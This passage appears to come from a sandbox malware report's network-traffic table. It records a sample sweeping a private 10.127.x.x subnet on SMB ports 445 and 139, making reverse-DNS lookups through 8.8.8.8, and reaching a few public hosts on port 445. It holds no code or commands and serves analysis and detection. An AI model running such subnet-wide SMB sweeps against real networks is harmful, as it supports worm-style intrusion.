| US | 8.8.8.8:53 | 61.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 62.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.155:139 | tcp | |
| N/A | 10.127.0.63:445 | tcp | |
| N/A | 10.127.0.66:445 | tcp | |
| N/A | 10.127.0.64:445 | tcp | |
| N/A | 10.127.0.65:445 | tcp | |
| N/A | 10.127.0.156:445 | tcp | |
| N/A | 10.127.0.66:139 | tcp | |
| N/A | 10.127.0.63:139 | tcp | |
| N/A | 10.127.0.64:139 | tcp | |
| N/A | 10.127.0.65:139 | tcp | |
| N/A | 10.127.0.156:139 | tcp | |
| N/A | 10.127.0.157:445 | tcp | |
| N/A | 10.127.0.157:139 | tcp | |
| N/A | 10.127.0.158:445 | tcp | |
| N/A | 10.127.0.158:139 | tcp | |
| N/A | 10.127.0.159:445 | tcp | |
| N/A | 10.127.0.159:139 | tcp | |
| N/A | 10.127.0.160:445 | tcp | |
| N/A | 10.127.0.160:139 | tcp | |
| N/A | 10.127.0.161:445 | tcp | |
| N/A | 10.127.0.161:139 | tcp | |
| US | 8.8.8.8:53 | 65.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 63.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.162:445 | tcp | |
| N/A | 10.127.0.162:139 | tcp | |
| N/A | 10.127.0.67:445 | tcp | |
| N/A | 10.127.0.70:445 | tcp | |
| N/A | 10.127.0.68:445 | tcp | |
| N/A | 10.127.0.69:445 | tcp | |
| N/A | 10.127.0.70:139 | tcp | |
| N/A | 10.127.0.67:139 | tcp | |
| N/A | 10.127.0.68:139 | tcp | |
| N/A | 10.127.0.69:139 | tcp | |
| N/A | 10.127.0.163:445 | tcp | |
| N/A | 10.127.0.163:139 | tcp | |
| N/A | 10.127.0.164:445 | tcp | |
| N/A | 10.127.0.164:139 | tcp | |
| N/A | 10.127.0.165:445 | tcp | |
| N/A | 10.127.0.165:139 | tcp | |
| N/A | 10.127.0.166:445 | tcp | |
| N/A | 10.127.0.166:139 | tcp | |
| N/A | 10.127.0.167:445 | tcp | |
| N/A | 10.127.0.167:139 | tcp | |
| N/A | 10.127.0.168:445 | tcp | |
| US | 8.8.8.8:53 | 70.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.168:139 | tcp | |
| N/A | 10.127.0.169:445 | tcp | |
| N/A | 10.127.0.75:445 | tcp | |
| N/A | 10.127.0.71:445 | tcp | |
| N/A | 10.127.0.73:445 | tcp | |
| N/A | 10.127.0.74:445 | tcp | |
| N/A | 10.127.0.169:139 | tcp | |
| N/A | 10.127.0.73:139 | tcp | |
| N/A | 10.127.0.74:139 | tcp | |
| N/A | 10.127.0.75:139 | tcp | |
| N/A | 10.127.0.71:139 | tcp | |
| N/A | 10.127.0.170:445 | tcp | |
| N/A | 10.127.0.170:139 | tcp | |
| N/A | 10.127.0.171:445 | tcp | |
| N/A | 10.127.0.171:139 | tcp | |
| N/A | 10.127.0.172:445 | tcp | |
| N/A | 10.127.0.172:139 | tcp | |
| N/A | 10.127.0.173:445 | tcp | |
| N/A | 10.127.0.173:139 | tcp | |
| N/A | 10.127.0.174:445 | tcp | |
| N/A | 10.127.0.174:139 | tcp | |
| US | 8.8.8.8:53 | 71.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.175:445 | tcp | |
| US | 8.8.8.8:53 | 74.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.175:139 | tcp | |
| N/A | 10.127.0.76:445 | tcp | |
| N/A | 10.127.0.176:445 | tcp | |
| N/A | 10.127.0.77:445 | tcp | |
| N/A | 10.127.0.78:445 | tcp | |
| N/A | 10.127.0.79:445 | tcp | |
| N/A | 10.127.0.76:139 | tcp | |
| N/A | 10.127.0.77:139 | tcp | |
| N/A | 10.127.0.79:139 | tcp | |
| N/A | 10.127.0.78:139 | tcp | |
| N/A | 10.127.0.176:139 | tcp | |
| N/A | 10.127.0.177:445 | tcp | |
| N/A | 10.127.0.177:139 | tcp | |
| N/A | 10.127.0.178:445 | tcp | |
| N/A | 10.127.0.178:139 | tcp | |
| N/A | 10.127.0.179:445 | tcp | |
| N/A | 10.127.0.179:139 | tcp | |
| N/A | 10.127.0.180:445 | tcp | |
| N/A | 10.127.0.180:139 | tcp | |
| N/A | 10.127.0.181:445 | tcp | |
| N/A | 10.127.0.181:139 | tcp | |
| US | 8.8.8.8:53 | 76.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 78.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.182:445 | tcp | |
| N/A | 10.127.0.182:139 | tcp | |
| N/A | 10.127.0.80:445 | tcp | |
| N/A | 10.127.0.83:445 | tcp | |
| N/A | 10.127.0.82:445 | tcp | |
| N/A | 10.127.0.81:445 | tcp | |
| N/A | 10.127.0.80:139 | tcp | |
| N/A | 10.127.0.82:139 | tcp | |
| N/A | 10.127.0.81:139 | tcp | |
| N/A | 10.127.0.83:139 | tcp | |
| N/A | 10.127.0.183:445 | tcp | |
| N/A | 10.127.0.183:139 | tcp | |
| N/A | 10.127.0.184:445 | tcp | |
| N/A | 10.127.0.184:139 | tcp | |
| N/A | 10.127.0.185:445 | tcp | |
| N/A | 10.127.0.185:139 | tcp | |
| N/A | 10.127.0.186:445 | tcp | |
| N/A | 10.127.0.186:139 | tcp | |
| N/A | 10.127.0.187:445 | tcp | |
| N/A | 10.127.0.187:139 | tcp | |
| N/A | 10.127.0.188:445 | tcp | |
| US | 8.8.8.8:53 | 80.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.188:139 | tcp | |
| N/A | 10.127.0.189:445 | tcp | |
| N/A | 10.127.0.84:445 | tcp | |
| N/A | 10.127.0.85:445 | tcp | |
| N/A | 10.127.0.86:445 | tcp | |
| N/A | 10.127.0.87:445 | tcp | |
| N/A | 10.127.0.189:139 | tcp | |
| N/A | 10.127.0.85:139 | tcp | |
| N/A | 10.127.0.86:139 | tcp | |
| N/A | 10.127.0.84:139 | tcp | |
| N/A | 10.127.0.87:139 | tcp | |
| N/A | 10.127.0.190:445 | tcp | |
| N/A | 10.127.0.190:139 | tcp | |
| N/A | 10.127.0.191:445 | tcp | |
| N/A | 10.127.0.191:139 | tcp | |
| N/A | 10.127.0.192:445 | tcp | |
| N/A | 10.127.0.192:139 | tcp | |
| N/A | 10.127.0.193:445 | tcp | |
| N/A | 10.127.0.193:139 | tcp | |
| N/A | 10.127.0.194:445 | tcp | |
| N/A | 10.127.0.194:139 | tcp | |
| US | 8.8.8.8:53 | 85.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 87.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.195:445 | tcp | |
| N/A | 10.127.0.195:139 | tcp | |
| N/A | 10.127.0.196:445 | tcp | |
| N/A | 10.127.0.88:445 | tcp | |
| N/A | 10.127.0.90:445 | tcp | |
| N/A | 10.127.0.89:445 | tcp | |
| N/A | 10.127.0.91:445 | tcp | |
| N/A | 10.127.0.88:139 | tcp | |
| N/A | 10.127.0.89:139 | tcp | |
| N/A | 10.127.0.90:139 | tcp | |
| N/A | 10.127.0.91:139 | tcp | |
| N/A | 10.127.0.196:139 | tcp | |
| N/A | 10.127.0.197:445 | tcp | |
| N/A | 10.127.0.197:139 | tcp | |
| N/A | 10.127.0.198:445 | tcp | |
| N/A | 10.127.0.198:139 | tcp | |
| N/A | 10.127.0.199:445 | tcp | |
| N/A | 10.127.0.199:139 | tcp | |
| N/A | 10.127.0.200:445 | tcp | |
| N/A | 10.127.0.200:139 | tcp | |
| N/A | 10.127.0.201:445 | tcp | |
| N/A | 10.127.0.201:139 | tcp | |
| US | 8.8.8.8:53 | 88.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.202:445 | tcp | |
| N/A | 10.127.0.202:139 | tcp | |
| N/A | 10.127.0.92:445 | tcp | |
| N/A | 10.127.0.93:445 | tcp | |
| N/A | 10.127.0.94:445 | tcp | |
| N/A | 10.127.0.95:445 | tcp | |
| N/A | 10.127.0.93:139 | tcp | |
| N/A | 10.127.0.94:139 | tcp | |
| N/A | 10.127.0.92:139 | tcp | |
| N/A | 10.127.0.95:139 | tcp | |
| N/A | 10.127.0.203:445 | tcp | |
| N/A | 10.127.0.203:139 | tcp | |
| N/A | 10.127.0.204:445 | tcp | |
| N/A | 10.127.0.204:139 | tcp | |
| N/A | 10.127.0.205:445 | tcp | |
| N/A | 10.127.0.205:139 | tcp | |
| N/A | 10.127.0.206:445 | tcp | |
| N/A | 10.127.0.206:139 | tcp | |
| N/A | 10.127.0.207:445 | tcp | |
| N/A | 10.127.0.207:139 | tcp | |
| N/A | 10.127.0.208:445 | tcp | |
| US | 8.8.8.8:53 | 93.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 94.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.208:139 | tcp | |
| N/A | 10.127.0.209:445 | tcp | |
| N/A | 10.127.0.98:445 | tcp | |
| N/A | 10.127.0.99:445 | tcp | |
| N/A | 10.127.0.96:445 | tcp | |
| N/A | 10.127.0.97:445 | tcp | |
| N/A | 10.127.0.209:139 | tcp | |
| N/A | 10.127.0.99:139 | tcp | |
| N/A | 10.127.0.98:139 | tcp | |
| N/A | 10.127.0.96:139 | tcp | |
| N/A | 10.127.0.97:139 | tcp | |
| N/A | 10.127.0.210:445 | tcp | |
| N/A | 10.127.0.210:139 | tcp | |
| N/A | 10.127.0.211:445 | tcp | |
| N/A | 10.127.0.211:139 | tcp | |
| N/A | 10.127.0.212:445 | tcp | |
| N/A | 10.127.0.212:139 | tcp | |
| N/A | 10.127.0.213:445 | tcp | |
| N/A | 10.127.0.213:139 | tcp | |
| N/A | 10.127.0.214:445 | tcp | |
| N/A | 10.127.0.214:139 | tcp | |
| US | 8.8.8.8:53 | 99.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 96.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.215:445 | tcp | |
| N/A | 10.127.0.215:139 | tcp | |
| N/A | 10.127.0.100:445 | tcp | |
| N/A | 10.127.0.101:445 | tcp | |
| N/A | 10.127.0.102:445 | tcp | |
| N/A | 10.127.0.103:445 | tcp | |
| N/A | 10.127.0.216:445 | tcp | |
| N/A | 10.127.0.216:139 | tcp | |
| N/A | 10.127.0.100:139 | tcp | |
| N/A | 10.127.0.101:139 | tcp | |
| N/A | 10.127.0.102:139 | tcp | |
| N/A | 10.127.0.103:139 | tcp | |
| N/A | 10.127.0.217:445 | tcp | |
| N/A | 10.127.0.217:139 | tcp | |
| N/A | 10.127.0.218:445 | tcp | |
| N/A | 10.127.0.218:139 | tcp | |
| N/A | 10.127.0.219:445 | tcp | |
| N/A | 10.127.0.219:139 | tcp | |
| N/A | 10.127.0.220:445 | tcp | |
| N/A | 10.127.0.220:139 | tcp | |
| N/A | 10.127.0.221:445 | tcp | |
| US | 8.8.8.8:53 | 100.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 102.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.221:139 | tcp | |
| N/A | 10.127.0.222:445 | tcp | |
| N/A | 10.127.0.222:139 | tcp | |
| N/A | 10.127.0.104:445 | tcp | |
| N/A | 10.127.0.105:445 | tcp | |
| N/A | 10.127.0.107:445 | tcp | |
| N/A | 10.127.0.106:445 | tcp | |
| N/A | 10.127.0.104:139 | tcp | |
| N/A | 10.127.0.105:139 | tcp | |
| N/A | 10.127.0.106:139 | tcp | |
| N/A | 10.127.0.107:139 | tcp | |
| N/A | 10.127.0.223:445 | tcp | |
| N/A | 10.127.0.223:139 | tcp | |
| N/A | 10.127.0.224:445 | tcp | |
| N/A | 10.127.0.224:139 | tcp | |
| N/A | 10.127.0.225:445 | tcp | |
| N/A | 10.127.0.225:139 | tcp | |
| N/A | 10.127.0.226:445 | tcp | |
| N/A | 10.127.0.226:139 | tcp | |
| N/A | 10.127.0.227:445 | tcp | |
| N/A | 10.127.0.227:139 | tcp | |
| N/A | 10.127.0.228:445 | tcp | |
| US | 8.8.8.8:53 | 104.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.228:139 | tcp | |
| N/A | 10.127.0.229:445 | tcp | |
| N/A | 10.127.0.109:445 | tcp | |
| N/A | 10.127.0.111:445 | tcp | |
| N/A | 10.127.0.108:445 | tcp | |
| N/A | 10.127.0.110:445 | tcp | |
| N/A | 10.127.0.229:139 | tcp | |
| N/A | 10.127.0.109:139 | tcp | |
| N/A | 10.127.0.108:139 | tcp | |
| N/A | 10.127.0.111:139 | tcp | |
| N/A | 10.127.0.110:139 | tcp | |
| N/A | 10.127.0.230:445 | tcp | |
| N/A | 10.127.0.230:139 | tcp | |
| N/A | 10.127.0.231:445 | tcp | |
| N/A | 10.127.0.231:139 | tcp | |
| N/A | 10.127.0.232:445 | tcp | |
| N/A | 10.127.0.232:139 | tcp | |
| N/A | 10.127.0.233:445 | tcp | |
| N/A | 10.127.0.233:139 | tcp | |
| N/A | 10.127.0.234:445 | tcp | |
| N/A | 10.127.0.234:139 | tcp | |
| US | 8.8.8.8:53 | 109.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 111.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 108.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 110.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.235:445 | tcp | |
| N/A | 10.127.0.235:139 | tcp | |
| N/A | 10.127.0.113:445 | tcp | |
| N/A | 10.127.0.112:445 | tcp | |
| N/A | 10.127.0.114:445 | tcp | |
| N/A | 10.127.0.115:445 | tcp | |
| N/A | 10.127.0.236:445 | tcp | |
| N/A | 10.127.0.114:139 | tcp | |
| N/A | 10.127.0.112:139 | tcp | |
| N/A | 10.127.0.113:139 | tcp | |
| N/A | 10.127.0.115:139 | tcp | |
| N/A | 10.127.0.236:139 | tcp | |
| N/A | 10.127.0.237:445 | tcp | |
| N/A | 10.127.0.237:139 | tcp | |
| N/A | 10.127.0.238:445 | tcp | |
| N/A | 10.127.0.238:139 | tcp | |
| N/A | 10.127.0.239:445 | tcp | |
| N/A | 10.127.0.239:139 | tcp | |
| N/A | 10.127.0.240:445 | tcp | |
| N/A | 10.127.0.240:139 | tcp | |
| N/A | 10.127.0.241:445 | tcp | |
| N/A | 10.127.0.241:139 | tcp | |
| US | 8.8.8.8:53 | 113.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 114.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 115.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 112.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.242:445 | tcp | |
| N/A | 10.127.0.119:445 | tcp | |
| N/A | 10.127.0.117:445 | tcp | |
| N/A | 10.127.0.116:445 | tcp | |
| N/A | 10.127.0.118:445 | tcp | |
| N/A | 10.127.0.242:139 | tcp | |
| N/A | 10.127.0.117:139 | tcp | |
| N/A | 10.127.0.116:139 | tcp | |
| N/A | 10.127.0.119:139 | tcp | |
| N/A | 10.127.0.118:139 | tcp | |
| N/A | 10.127.0.243:445 | tcp | |
| N/A | 10.127.0.243:139 | tcp | |
| N/A | 10.127.0.244:445 | tcp | |
| N/A | 10.127.0.244:139 | tcp | |
| N/A | 10.127.0.245:445 | tcp | |
| N/A | 10.127.0.245:139 | tcp | |
| N/A | 10.127.0.246:445 | tcp | |
| N/A | 10.127.0.246:139 | tcp | |
| N/A | 10.127.0.247:445 | tcp | |
| N/A | 10.127.0.247:139 | tcp | |
| US | 8.8.8.8:53 | 119.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 116.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 118.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.248:445 | tcp | |
| N/A | 10.127.0.248:139 | tcp | |
| N/A | 10.127.0.249:445 | tcp | |
| N/A | 10.127.0.123:445 | tcp | |
| N/A | 10.127.0.120:445 | tcp | |
| N/A | 10.127.0.121:445 | tcp | |
| N/A | 10.127.0.122:445 | tcp | |
| N/A | 10.127.0.122:139 | tcp | |
| N/A | 10.127.0.120:139 | tcp | |
| N/A | 10.127.0.123:139 | tcp | |
| N/A | 10.127.0.121:139 | tcp | |
| N/A | 10.127.0.249:139 | tcp | |
| N/A | 10.127.0.250:445 | tcp | |
| N/A | 10.127.0.250:139 | tcp | |
| N/A | 10.127.0.251:445 | tcp | |
| N/A | 10.127.0.251:139 | tcp | |
| N/A | 10.127.0.252:445 | tcp | |
| N/A | 10.127.0.252:139 | tcp | |
| N/A | 10.127.0.253:445 | tcp | |
| N/A | 10.127.0.253:139 | tcp | |
| N/A | 10.127.0.254:445 | tcp | |
| N/A | 10.127.0.254:139 | tcp | |
| US | 8.8.8.8:53 | 122.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 123.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 120.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 121.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.255:445 | tcp | |
| N/A | 10.127.0.255:139 | tcp | |
| N/A | 10.127.0.125:445 | tcp | |
| N/A | 10.127.0.124:445 | tcp | |
| N/A | 10.127.0.127:445 | tcp | |
| N/A | 10.127.0.126:445 | tcp | |
| N/A | 10.127.0.124:139 | tcp | |
| N/A | 10.127.0.127:139 | tcp | |
| N/A | 10.127.0.125:139 | tcp | |
| N/A | 10.127.0.126:139 | tcp | |
| N/A | 10.127.1.0:445 | tcp | |
| N/A | 10.127.1.0:139 | tcp | |
| N/A | 10.127.1.1:445 | tcp | |
| N/A | 10.127.1.1:139 | tcp | |
| N/A | 10.127.1.2:445 | tcp | |
| N/A | 10.127.1.2:139 | tcp | |
| N/A | 10.127.1.3:445 | tcp | |
| N/A | 10.127.1.3:139 | tcp | |
| N/A | 10.127.1.4:445 | tcp | |
| N/A | 10.127.1.4:139 | tcp | |
| N/A | 10.127.1.5:445 | tcp | |
| US | 8.8.8.8:53 | 127.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 126.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 124.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 125.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.1.5:139 | tcp | |
| N/A | 10.127.1.6:445 | tcp | |
| N/A | 10.127.0.131:445 | tcp | |
| N/A | 10.127.0.130:445 | tcp | |
| N/A | 10.127.0.128:445 | tcp | |
| N/A | 10.127.0.129:445 | tcp | |
| N/A | 10.127.1.6:139 | tcp | |
| N/A | 10.127.0.131:139 | tcp | |
| N/A | 10.127.0.129:139 | tcp | |
| N/A | 10.127.0.130:139 | tcp | |
| N/A | 10.127.0.128:139 | tcp | |
| N/A | 10.127.1.7:445 | tcp | |
| N/A | 10.127.1.7:139 | tcp | |
| N/A | 10.127.1.8:445 | tcp | |
| N/A | 10.127.1.8:139 | tcp | |
| N/A | 10.127.1.9:445 | tcp | |
| N/A | 10.127.1.9:139 | tcp | |
| N/A | 10.127.1.10:445 | tcp | |
| N/A | 10.127.1.10:139 | tcp | |
| N/A | 10.127.1.11:445 | tcp | |
| N/A | 10.127.1.11:139 | tcp | |
| N/A | 10.127.1.12:445 | tcp | |
| US | 8.8.8.8:53 | 131.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 130.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 128.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.1.12:139 | tcp | |
| N/A | 10.127.0.133:445 | tcp | |
| N/A | 10.127.0.132:445 | tcp | |
| N/A | 10.127.0.134:445 | tcp | |
| N/A | 10.127.0.135:445 | tcp | |
| N/A | 10.127.1.13:445 | tcp | |
| N/A | 10.127.0.134:139 | tcp | |
| N/A | 10.127.0.132:139 | tcp | |
| N/A | 10.127.0.133:139 | tcp | |
| N/A | 10.127.0.135:139 | tcp | |
| N/A | 10.127.1.13:139 | tcp | |
| N/A | 10.127.1.14:445 | tcp | |
| N/A | 10.127.1.14:139 | tcp | |
| N/A | 10.127.1.15:445 | tcp | |
| N/A | 10.127.1.15:139 | tcp | |
| N/A | 10.127.1.16:445 | tcp | |
| N/A | 10.127.1.16:139 | tcp | |
| N/A | 10.127.1.17:445 | tcp | |
| N/A | 10.127.1.17:139 | tcp | |
| N/A | 10.127.1.18:445 | tcp | |
| N/A | 10.127.1.18:139 | tcp | |
| US | 8.8.8.8:53 | 134.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 132.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 135.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.1.19:445 | tcp | |
| N/A | 10.127.1.19:139 | tcp | |
| N/A | 10.127.0.139:445 | tcp | |
| N/A | 10.127.0.136:445 | tcp | |
| N/A | 10.127.0.137:445 | tcp | |
| N/A | 10.127.0.138:445 | tcp | |
| N/A | 10.127.0.139:139 | tcp | |
| N/A | 10.127.0.138:139 | tcp | |
| N/A | 10.127.0.137:139 | tcp | |
| N/A | 10.127.0.136:139 | tcp | |
| N/A | 10.127.1.20:445 | tcp | |
| N/A | 10.127.1.20:139 | tcp | |
| N/A | 10.127.1.21:445 | tcp | |
| N/A | 10.127.1.21:139 | tcp | |
| N/A | 10.127.1.22:445 | tcp | |
| N/A | 10.127.1.22:139 | tcp | |
| N/A | 10.127.1.23:445 | tcp | |
| N/A | 10.127.1.23:139 | tcp | |
| N/A | 10.127.1.24:445 | tcp | |
| N/A | 10.127.1.24:139 | tcp | |
| N/A | 10.127.1.25:445 | tcp | |
| US | 8.8.8.8:53 | 139.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.1.25:139 | tcp | |
| N/A | 10.127.1.26:445 | tcp | |
| N/A | 10.127.0.140:445 | tcp | |
| N/A | 10.127.0.141:445 | tcp | |
| N/A | 10.127.0.142:445 | tcp | |
| N/A | 10.127.0.143:445 | tcp | |
| N/A | 10.127.1.26:139 | tcp | |
| N/A | 10.127.0.142:139 | tcp | |
| N/A | 10.127.0.140:139 | tcp | |
| N/A | 10.127.0.143:139 | tcp | |
| N/A | 10.127.0.141:139 | tcp | |
| N/A | 10.127.1.27:445 | tcp | |
| N/A | 10.127.1.27:139 | tcp | |
| N/A | 10.127.1.28:445 | tcp | |
| N/A | 10.127.1.28:139 | tcp | |
| N/A | 10.127.1.29:445 | tcp | |
| N/A | 10.127.1.29:139 | tcp | |
| N/A | 10.127.1.30:445 | tcp | |
| N/A | 10.127.1.30:139 | tcp | |
| N/A | 10.127.1.31:445 | tcp | |
| N/A | 10.127.1.31:139 | tcp | |
| N/A | 10.127.1.32:445 | tcp | |
| US | 8.8.8.8:53 | 142.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 141.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 143.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.1.32:139 | tcp | |
| N/A | 10.127.0.145:445 | tcp | |
| N/A | 10.127.0.144:445 | tcp | |
| N/A | 10.127.0.147:445 | tcp | |
| N/A | 10.127.0.146:445 | tcp | |
| N/A | 10.127.1.33:445 | tcp | |
| N/A | 10.127.0.147:139 | tcp | |
| N/A | 10.127.0.145:139 | tcp | |
| N/A | 10.127.0.144:139 | tcp | |
| N/A | 10.127.0.146:139 | tcp | |
| N/A | 10.127.1.33:139 | tcp | |
| N/A | 10.127.1.34:445 | tcp | |
| N/A | 10.127.1.34:139 | tcp | |
| N/A | 10.127.1.35:445 | tcp | |
| N/A | 10.127.1.35:139 | tcp | |
| N/A | 10.127.1.36:445 | tcp | |
| N/A | 10.127.1.36:139 | tcp | |
| N/A | 10.127.1.37:445 | tcp | |
| N/A | 10.127.1.37:139 | tcp | |
| N/A | 10.127.1.38:445 | tcp | |
| US | 8.8.8.8:53 | 147.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 145.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.1.38:139 | tcp | |
| N/A | 10.127.1.39:445 | tcp | |
| N/A | 10.127.1.39:139 | tcp | |
| N/A | 10.127.0.148:445 | tcp | |
| N/A | 10.127.0.151:445 | tcp | |
| N/A | 10.127.0.149:445 | tcp | |
| N/A | 10.127.0.150:445 | tcp | |
| N/A | 10.127.0.149:139 | tcp | |
| N/A | 10.127.0.148:139 | tcp | |
| N/A | 10.127.0.151:139 | tcp | |
| N/A | 10.127.0.150:139 | tcp | |
| N/A | 10.127.1.40:445 | tcp | |
| N/A | 10.127.1.40:139 | tcp | |
| N/A | 10.127.1.41:445 | tcp | |
| N/A | 10.127.1.41:139 | tcp | |
| N/A | 10.127.1.42:445 | tcp | |
| N/A | 10.127.1.42:139 | tcp | |
| N/A | 10.127.1.43:445 | tcp | |
| N/A | 10.127.1.43:139 | tcp | |
| US | 13.107.253.64:445 | tcp | |
| N/A | 10.127.1.44:445 | tcp | |
| N/A | 10.127.1.44:139 | tcp | |
| N/A | 10.127.1.45:445 | tcp | |
| N/A | 10.127.1.45:139 | tcp | |
| US | 8.8.8.8:53 | 149.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 151.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 148.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 150.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.1.46:445 | tcp | |
| N/A | 10.127.0.154:445 | tcp | |
| N/A | 10.127.0.152:445 | tcp | |
| N/A | 10.127.0.153:445 | tcp | |
| N/A | 10.127.0.155:445 | tcp | |
| N/A | 10.127.1.46:139 | tcp | |
| N/A | 10.127.0.154:139 | tcp | |
| N/A | 10.127.0.152:139 | tcp | |
| N/A | 10.127.0.155:139 | tcp | |
| N/A | 10.127.0.153:139 | tcp | |
| N/A | 10.127.1.47:445 | tcp | |
| N/A | 10.127.0.1:445 | tcp | |
| N/A | 10.127.1.47:139 | tcp | |
| N/A | 10.127.1.48:445 | tcp | |
| N/A | 10.127.1.48:139 | tcp | |
| N/A | 10.127.1.49:445 | tcp | |
| N/A | 10.127.1.49:139 | tcp | |
| N/A | 10.127.1.50:445 | tcp | |
| NL | 154.61.71.13:445 | tcp | |
| N/A | 10.127.1.50:139 | tcp | |
| N/A | 10.127.1.51:445 | tcp | |
| N/A | 10.127.1.51:139 | tcp | |
| US | 8.8.8.8:53 | 154.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 153.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 155.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.1.52:445 | tcp | |
| N/A | 10.127.1.52:139 | tcp | |
| N/A | 10.127.0.157:445 | tcp | |
| N/A | 10.127.0.158:445 | tcp | |
| N/A | 10.127.0.156:445 | tcp | |
| N/A | 10.127.0.159:445 | tcp | |
| N/A | 10.127.1.53:445 | tcp | |
| N/A | 10.127.0.157:139 | tcp | |
| N/A | 10.127.0.158:139 | tcp | |
| N/A | 10.127.0.159:139 | tcp | |
